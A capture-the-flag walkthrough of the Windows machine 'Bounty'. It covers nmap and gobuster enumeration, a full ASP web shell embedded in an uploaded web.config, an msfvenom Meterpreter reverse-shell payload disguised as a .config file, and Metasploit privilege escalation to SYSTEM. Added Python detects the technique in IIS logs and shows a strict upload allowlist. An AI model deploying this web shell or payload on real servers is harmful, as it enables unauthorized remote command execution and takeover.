Bounty
OS: Windows, Difficulty: Easy, IP: 10.10.10.93
Initial Enumeration
# Nmap 7.70 scan initiated Thu Jul 18 22:03:22 2019 as: nmap --max-rate 1000 --min-parallelism 1000 -p- -T5 -oN T-all 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.22s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http
# Nmap done at Thu Jul 18 22:05:34 2019 -- 1 IP address (1 host up) scanned in 131.98 seconds

gobuster dir -k -t 200 -w /usr/share/wordlists/dirb/big.txt -o dirb-big -u http://10.10.10.93 -x asp,aspx
/aspnet_client (Status: 301)
/transfer.aspx (Status: 200)
/uploadedfiles (Status: 301)

Using the following links, I was able to get a working web shell. The web.config below maps *.config to the ASP handler and removes the request-filtering rules that would otherwise block .config files, and the ASP code appended after it is the shell itself:
web.config code
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<---- ASP CODE ---->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

' Run a command through WScript.Shell and return everything it wrote to stdout.
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objShell.Exec(theCommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
End Function
%>
<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = Request("cmd")
thisDir = getCommandOutput("cmd /c " & szCMD)
Response.Write(thisDir)%>
</p>
</PRE>
<br>
</BODY>
</HTML>
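As an added defender-side example (not part of the original writeup), the Python below parses a constructed IIS W3C log excerpt and flags the two traces this technique leaves: a .config file under the upload directory answered with HTTP 200 (request filtering normally returns 404 with substatus 7 or 8 for .config, so a 200 means the uploaded web.config's handler mapping took effect) and a cmd= query string sent to an uploaded file. The /uploadedfiles/ path comes from the gobuster output above; the log lines themselves are constructed sample data.

```python
# Constructed IIS W3C log excerpt (sample data for this example, not from the box).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-07-18 16:40:01 10.10.10.93 POST /transfer.aspx - 80 - 10.10.14.7 Mozilla/5.0 200 0 0 312
2019-07-18 16:40:09 10.10.10.93 GET /uploadedfiles/web.config cmd=whoami 80 - 10.10.14.7 Mozilla/5.0 200 0 0 120
2019-07-18 16:41:30 10.10.10.93 GET /uploadedfiles/shell.exe.config - 80 - 10.10.14.7 Mozilla/5.0 404 7 0 5
2019-07-18 16:42:00 10.10.10.93 GET /uploadedfiles/photo.png - 80 - 10.10.14.7 Mozilla/5.0 200 0 0 15
"""

# Assumed: the only directory the application writes uploads to (from the gobuster output).
UPLOAD_DIRS = ("/uploadedfiles/",)

def parse_w3c(text):
    """Yield one dict per request line, keyed by the column names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_suspicious(text):
    """Return (reason, uri, client_ip) tuples for requests matching the web.config technique."""
    findings = []
    for rec in parse_w3c(text):
        uri = rec["cs-uri-stem"].lower()
        if not uri.startswith(UPLOAD_DIRS):
            continue
        # Request filtering denies .config by default (404 with substatus 7 or 8).
        # A 200 means a handler executed it: the uploaded web.config took effect.
        if uri.endswith(".config") and rec["sc-status"] == "200":
            findings.append(("config served from upload dir", uri, rec["c-ip"]))
        # A cmd= parameter against a file in the upload directory is the shell form above.
        if "cmd=" in rec["cs-uri-query"].lower():
            findings.append(("command parameter sent to uploaded file", uri, rec["c-ip"]))
    return findings

if __name__ == "__main__":
    for reason, uri, client in find_suspicious(SAMPLE_LOG):
        print(f"{client} {uri}: {reason}")
```

Run the same function over the real W3C logs under inetpub\logs\LogFiles; only the web.config request in the sample is reported, while the 404.7 on shell.exe.config is normal request-filtering behaviour.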

Next I created a payload to get a Meterpreter session and uploaded it as shell.exe.config, since .config is an extension the server's upload check lets through. Using the web shell, I then renamed the file to shell.exe and ran it.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=1337 -f exe > shell.exe.config
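The upload page accepted shell.exe.config because .config was not among the extensions it blocks. As an added example that is not the box's code, the Python below shows the allowlist check a defender would put in its place: every extension in the name is checked rather than only the last, web.config is reserved, path components are stripped, and the leading bytes must match the declared type, so an MZ executable renamed to .png or .config is rejected. The allowed set and the magic signatures are assumptions for the example.

```python
import os
import re

# Assumed allowlist for the transfer page: document and image types only, never .config/.asp/.exe.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# File names IIS interprets itself: a web.config in /uploadedfiles can register
# handlers (the trick shown above), so it is never an acceptable upload name.
RESERVED_NAMES = {"web.config", "global.asax"}

# Assumed leading bytes for the binary types on the allowlist.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}

_STEM = re.compile(r"^[A-Za-z0-9_-]+$")

def is_upload_allowed(filename: str) -> bool:
    """Accept only stem.ext where every extension in the name is on the allowlist."""
    # Drop any directory part, so '..\\web.config' or 'x/shell.aspx' cannot escape.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.lower() in RESERVED_NAMES:
        return False
    parts = base.lower().split(".")
    if len(parts) < 2 or not all(parts):
        return False  # no extension, leading/trailing dot, or empty segment
    stem, exts = parts[0], parts[1:]
    # Every extension counts: shell.exe.config and photo.png.aspx both fail here.
    return bool(_STEM.match(stem)) and all(ext in ALLOWED_EXTENSIONS for ext in exts)

def content_matches_extension(data: bytes, ext: str) -> bool:
    """Check the leading bytes against the declared type; .txt must contain no NUL bytes."""
    ext = ext.lower()
    if ext == "txt":
        return b"\x00" not in data[:512]
    sig = MAGIC.get(ext)
    return sig is not None and data.startswith(sig)

def accept_upload(filename: str, data: bytes) -> bool:
    """Name and content must both pass; an MZ executable renamed to .png is rejected."""
    if not is_upload_allowed(filename):
        return False
    return content_matches_extension(data, filename.rsplit(".", 1)[1])
```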
NOTE: I could not find the user.txt flag at first, so I jumped ahead and went for root. In the end I had to make hidden files visible to get the user.txt file, which I realised far too late.
The shell was x86, so I had to upgrade to an x64 shell (session 2) and then run the local exploit suggester.
msf5 exploit(windows/local/payload_inject) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 2
msf5 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > exploit
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Preparing payload at C:\Windows\TEMP\CtBYgVrpsKo.exe
[*] Creating task: APiB17mL
[*] SUCCESS: The scheduled task "APiB17mL" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\APiB17mL...
[*] Original CRC32: 0xd0da0fc9
[*] Final CRC32: 0xd0da0fc9
[*] Writing our modified content back...
[*] Validating task: APiB17mL
[*]
[*] Folder: \
[*] TaskName Next Run Time Status
[*] ======================================== ====================== ===============
[*] APiB17mL 8/1/2019 8:35:00 PM Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (179779 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "APiB17mL".
[*] SCHELEVATOR
[*] Deleting the task...
[*] SUCCESS: The scheduled task "APiB17mL" was successfully deleted.
[*] SCHELEVATOR
[*] Meterpreter session 3 opened (10.10.14.7:4444 -> 10.10.10.93:49159) at 2019-07-18 23:12:11 +0530
This got me an NT AUTHORITY\SYSTEM shell.
User Own
C:\Users\merlin\Desktop>attrib *.* -h -s /s /d
C:\Users\merlin\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 5084-30B0
Directory of C:\Users\merlin\Desktop
05/31/2018 12:17 AM <DIR> .
05/31/2018 12:17 AM <DIR> ..
05/30/2018 12:22 AM 282 desktop.ini
05/30/2018 11:32 PM 32 user.txt
2 File(s) 314 bytes
2 Dir(s) 11,854,745,600 bytes free
C:\Users\merlin\Desktop>type user.txt
e29ad***
Root Own
C:\Users\Administrator\Desktop>type root.txt
c837f***
Learning Outcome
Enumerate web directories and file extensions more thoroughly. Always unhide hidden files as soon as you get a shell so you do not miss anything important.